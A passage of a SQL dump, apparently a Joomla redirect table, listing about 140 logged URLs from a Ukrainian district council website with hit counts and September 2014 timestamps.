00:00:00',301),(2967,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 09:39:51','0000-00-00 00:00:00',301),(2968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 09:40:45','0000-00-00 00:00:00',301),(2969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',13,0,'2014-09-20 09:41:45','0000-00-00 00:00:00',301),(2970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-20 09:42:00','0000-00-00 00:00:00',301),(2971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49&Itemid=88&lang=uk','','','',8,0,'2014-09-20 09:42:34','0000-00-00 00:00:00',301),(2972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56&Itemid=97&lang=uk','','','',2,0,'2014-09-20 09:45:28','0000-00-00 00:00:00',301),(2973,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 09:46:15','0000-00-00 00:00:00',301),(2974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 09:47:07','0000-00-00 00:00:00',301),(2975,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=1&lang=en','','','',7,0,'2014-09-20 09:52:14','0000-00-00 00:00:00',301),(2976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-----l-r--2011--2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-20 09:58:44','0000-00-00 00:00:00',301),(2977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=en&Itemid=0','','','',5,0,'2014-09-20 09:59:35','0000-00-00 00:00:00',301),(2978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-20 10:02:00','0000-00-00 00:00:00',301),(2979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-20 10:03:34','0000-00-00 00:00:00',301),(2980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=en','','','',9,0,'2014-09-20 10:06:13','0000-00-00 00:00:00',301),(2981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-20 10:07:00','0000-00-00 00:00:00',301),(2982,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48:--11032013-&Itemid=87&lang=en','','','',3,0,'2014-09-20 10:07:51','0000-00-00 00:00:00',301),(2983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51&Itemid=92&lang=en','','','',9,0,'2014-09-20 10:08:19','0000-00-00 00:00:00',301),(2984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-20 10:08:37','0000-00-00 00:00:00',301),(2985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1077:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-20 10:11:11','0000-00-00 00:00:00',301),(2986,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53&Itemid=94&lang=en','','','',1,0,'2014-09-20 10:11:16','0000-00-00 00:00:00',301),(2987,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-20 10:13:48','0000-00-00 00:00:00',301),(2988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-20 10:15:11','0000-00-00 00:00:00',301),(2989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 10:15:43','0000-00-00 00:00:00',301),(2990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=ru','','','',3,0,'2014-09-20 10:17:51','0000-00-00 00:00:00',301),(2991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=uk&Itemid=','','','',10,0,'2014-09-20 10:18:22','0000-00-00 00:00:00',301),(2992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-20 10:20:29','0000-00-00 00:00:00',301),(2993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 10:26:18','0000-00-00 00:00:00',301),(2994,'http://www.malyn-rayrada.org.ua/images/stories/ak.php','','','',1,0,'2014-09-20 10:36:21','0000-00-00 00:00:00',301),(2995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-20 10:37:06','0000-00-00 00:00:00',301),(2996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&lang=uk','','','',3,0,'2014-09-20 10:38:06','0000-00-00 00:00:00',301),(2997,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55&Itemid=96&lang=ru','','','',1,0,'2014-09-20 10:42:42','0000-00-00 00:00:00',301),(2998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-20 10:45:21','0000-00-00 00:00:00',301),(2999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-20 10:46:32','0000-00-00 00:00:00',301),(3000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',5,0,'2014-09-20 10:55:50','0000-00-00 00:00:00',301),(3001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-20 10:56:37','0000-00-00 00:00:00',301),(3002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 10:57:40','0000-00-00 00:00:00',301),(3003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=uk','','','',4,0,'2014-09-20 10:58:54','0000-00-00 00:00:00',301),(3004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51:--19072013-&Itemid=92&lang=en','','','',4,0,'2014-09-20 11:02:10','0000-00-00 00:00:00',301),(3005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-20 11:02:50','0000-00-00 00:00:00',301),(3006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-20 11:04:53','0000-00-00 00:00:00',301),(3007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-09-20 11:09:27','0000-00-00 00:00:00',301),(3008,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-20 11:11:47','0000-00-00 00:00:00',301),(3009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53&Itemid=94&lang=en','','','',12,0,'2014-09-20 11:15:28','0000-00-00 00:00:00',301),(3010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-20 11:17:27','0000-00-00 00:00:00',301),(3011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15&lang=uk','','','',5,0,'2014-09-20 11:19:02','0000-00-00 00:00:00',301),(3012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53:--25102013-&Itemid=94&lang=en','','','',4,0,'2014-09-20 11:22:54','0000-00-00 00:00:00',301),(3013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:-21022013-&Itemid=86&lang=ru','','','',6,0,'2014-09-20 11:25:05','0000-00-00 00:00:00',301),(3014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=en','','','',4,0,'2014-09-20 11:26:12','0000-00-00 00:00:00',301),(3015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1076:------l---2011-2013-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-20 11:28:03','0000-00-00 00:00:00',301),(3016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-20 11:32:23','0000-00-00 00:00:00',301),(3017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-20 11:34:23','0000-00-00 00:00:00',301),(3018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 11:36:20','0000-00-00 00:00:00',301),(3019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=892:2013-01-08-13-26-18&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 11:37:17','0000-00-00 00:00:00',301),(3020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-20 11:38:26','0000-00-00 00:00:00',301),(3021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=en','','','',7,0,'2014-09-20 11:40:33','0000-00-00 00:00:00',301),(3022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59:--20062014-&Itemid=107&lang=en','','','',5,0,'2014-09-20 11:48:02','0000-00-00 00:00:00',301),(3023,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-20 11:48:37','0000-00-00 00:00:00',301),(3024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1153:-2013-&catid=54:--29112013-&Itemid=95&lang=en','','','',4,0,'2014-09-20 11:51:46','0000-00-00 00:00:00',301),(3025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=uk','','','',3,0,'2014-09-20 11:52:08','0000-00-00 00:00:00',301),(3026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=uk','','','',2,0,'2014-09-20 11:53:57','0000-00-00 00:00:00',301),(3027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=uk','','','',3,0,'2014-09-20 11:54:08','0000-00-00 00:00:00',301),(3028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&lang=uk','','','',3,0,'2014-09-20 11:57:11','0000-00-00 00:00:00',301),(3029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=en','','','',4,0,'2014-09-20 11:57:19','0000-00-00 00:00:00',301),(3030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=en','','','',3,0,'2014-09-20 11:57:53','0000-00-00 00:00:00',301),(3031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=en','','','',13,0,'2014-09-20 11:59:10','0000-00-00 00:00:00',301),(3032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=uk','','','',7,0,'2014-09-20 12:00:19','0000-00-00 00:00:00',301),(3033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=uk','','','',3,0,'2014-09-20 12:02:06','0000-00-00 00:00:00',301),(3034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-20 12:03:06','0000-00-00 00:00:00',301),(3035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=en','','','',6,0,'2014-09-20 12:06:03','0000-00-00 00:00:00',301),(3036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=en','','','',5,0,'2014-09-20 12:06:33','0000-00-00 00:00:00',301),(3037,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=en','','','',12,0,'2014-09-20 12:07:35','0000-00-00 00:00:00',301),(3038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=en','','','',6,0,'2014-09-20 12:08:37','0000-00-00 00:00:00',301),(3039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&lang=uk','','','',7,0,'2014-09-20 12:09:13','0000-00-00 00:00:00',301),(3040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&Itemid=14&lang=uk','','','',23,0,'2014-09-20 12:13:48','0000-00-00 00:00:00',301),(3041,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53&Itemid=94&lang=en','','','',1,0,'2014-09-20 12:13:55','0000-00-00 00:00:00',301),(3042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=en','','','',7,0,'2014-09-20 12:16:08','0000-00-00 00:00:00',301),(3043,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56&Itemid=97&lang=ru','','','',4,0,'2014-09-20 12:16:21','0000-00-00 00:00:00',301),(3044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=en','','','',4,0,'2014-09-20 12:17:38','0000-00-00 00:00:00',301),(3045,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-20 12:19:51','0000-00-00 00:00:00',301),(3046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-20 12:20:02','0000-00-00 00:00:00',301),(3047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&Itemid=14&lang=uk','','','',30,0,'2014-09-20 12:22:56','0000-00-00 00:00:00',301),(3048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59:--20062014-&Itemid=107&lang=uk','','','',12,0,'2014-09-20 12:26:02','0000-00-00 00:00:00',301),(3049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-20 12:27:17','0000-00-00 00:00:00',301),(3050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=uk','','','',2,0,'2014-09-20 12:27:51','0000-00-00 00:00:00',301),(3051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 12:27:59','0000-00-00 00:00:00',301),(3052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-20 12:28:02','0000-00-00 00:00:00',301),(3053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10&Itemid=17&lang=uk','','','',22,0,'2014-09-20 12:29:23','0000-00-00 00:00:00',301),(3054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54:--29112013-&Itemid=95&lang=en','','','',10,0,'2014-09-20 12:31:10','0000-00-00 00:00:00',301),(3055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33:-20052011&Itemid=66&lang=en','','','',7,0,'2014-09-20 12:31:42','0000-00-00 00:00:00',301),(3056,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-20 12:31:48','0000-00-00 00:00:00',301),(3057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 12:32:23','0000-00-00 00:00:00',301),(3058,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-20 12:33:04','0000-00-00 00:00:00',301),(3059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=986:-20-&catid=11&lang=en','','','',5,0,'2014-09-20 12:33:52','0000-00-00 00:00:00',301),(3060,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=en','','','',2,0,'2014-09-20 12:35:08','0000-00-00 00:00:00',301),(3061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-20 12:35:21','0000-00-00 00:00:00',301),(3062,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-09-20 12:35:58','0000-00-00 00:00:00',301),(3063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-20 12:36:46','0000-00-00 00:00:00',301),(3064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=uk','','','',4,0,'2014-09-20 12:38:48','0000-00-00 00:00:00',301),(3065,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-20 12:39:58','0000-00-00 00:00:00',301),(3066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-20 12:40:15','0000-00-00 00:00:00',301),(3067,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=uk','','','',5,0,'2014-09-20 12:41:21','0000-00-00 00:00:00',301),(3068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-20 12:43:28','0000-00-00 00:00:00',301),(3069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 12:44:21','0000-00-00 00:00:00',301),(3070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 12:45:34','0000-00-00 00:00:00',301),(3071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=en','','','',9,0,'2014-09-20 12:46:07','0000-00-00 00:00:00',301),(3072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-20 12:47:16','0000-00-00 00:00:00',301),(3073,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 12:49:49','0000-00-00 00:00:00',301),(3074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:------------2011-2015-&catid=36&Itemid=70&lang=en','','','',5,0,'2014-09-20 12:50:17','0000-00-00 00:00:00',301),(3075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1126:2013-10-31-12-52-35&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-20 12:50:24','0000-00-00 00:00:00',301),(3076,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54:--29112013-&Itemid=95&lang=en','','','',1,0,'2014-09-20 12:51:47','0000-00-00 00:00:00',301),(3077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=uk','','','',4,0,'2014-09-20 12:51:58','0000-00-00 00:00:00',301),(3078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-20 12:52:31','0000-00-00 00:00:00',301),(3079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-20 12:52:42','0000-00-00 00:00:00',301),(3080,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:-l-2011-2013-r&catid=53:--25102013-&Itemid=94&lang=en','','','',1,0,'2014-09-20 12:53:22','0000-00-00 00:00:00',301),(3081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-09-20 12:55:14','0000-00-00 00:00:00',301),(3082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',11,0,'2014-09-20 12:56:19','0000-00-00 00:00:00',301),(3083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49&Itemid=88&lang=ru','','','',2,0,'2014-09-20 12:57:14','0000-00-00 00:00:00',301),(3084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=uk','','','',5,0,'2014-09-20 12:58:07','0000-00-00 00:00:00',301),(3085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=en','','','',6,0,'2014-09-20 12:58:29','0000-00-00 00:00:00',301),(3086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-20 12:58:54','0000-00-00 00:00:00',301),(3087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-20 13:00:15','0000-00-00 00:00:00',301),(3088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-20 13:01:51','0000-00-00 00:00:00',301),(3089,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33&Itemid=66&lang=en','','','',4,0,'2014-09-20 13:05:01','0000-00-00 00:00:00',301),(3090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 13:23:57','0000-00-00 00:00:00',301),(3091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 13:26:45','0000-00-00 00:00:00',301),(3092,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-09-20 13:27:44','0000-00-00 00:00:00',301),(3093,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=32&lang=uk','','','',17,0,'2014-09-20 13:28:00','0000-00-00 00:00:00',301),(3094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-20 13:29:16','0000-00-00 00:00:00',301),(3095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=en','','','',5,0,'2014-09-20 13:29:27','0000-00-00 00:00:00',301),(3096,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33:-20052011&Itemid=66&lang=en','','','',3,0,'2014-09-20 13:33:11','0000-00-00 00:00:00',301),(3097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=uk','','','',3,0,'2014-09-20 13:33:46','0000-00-00 00:00:00',301),(3098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-09-20 13:34:47','0000-00-00 00:00:00',301),(3099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=uk','','','',6,0,'2014-09-20 13:35:11','0000-00-00 00:00:00',301),(3100,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49&Itemid=88&lang=uk','','','',7,0,'2014-09-20 13:36:06','0000-00-00 00:00:00',301),(3101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&lang=ru','','','',3,0,'2014-09-20 13:36:33','0000-00-00 00:00:00',301),(3102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-20 13:37:38','0000-00-00 00:00:00',301),(3103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46&Itemid=85&lang=uk','','','',7,0,'2014-09-20 13:37:46','0000-00-00 00:00:00',301),(3104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=uk','','','',6,0,'2014-09-20 13:38:01','0000-00-00 00:00:00',301),(3105,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 13:38:32','0000-00-00 00:00:00',301),(3106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-20 13:38:36','0000-00-00 00:00:00',301),(3107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=uk','','','',6,0,'2014-09-20 13:38:59','0000-00-00 00:00:00',301),(3108,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48:--11032013-&Itemid=87&lang=ru','','','',3,0,'2014-09-20 13:39:21','0000-00-00 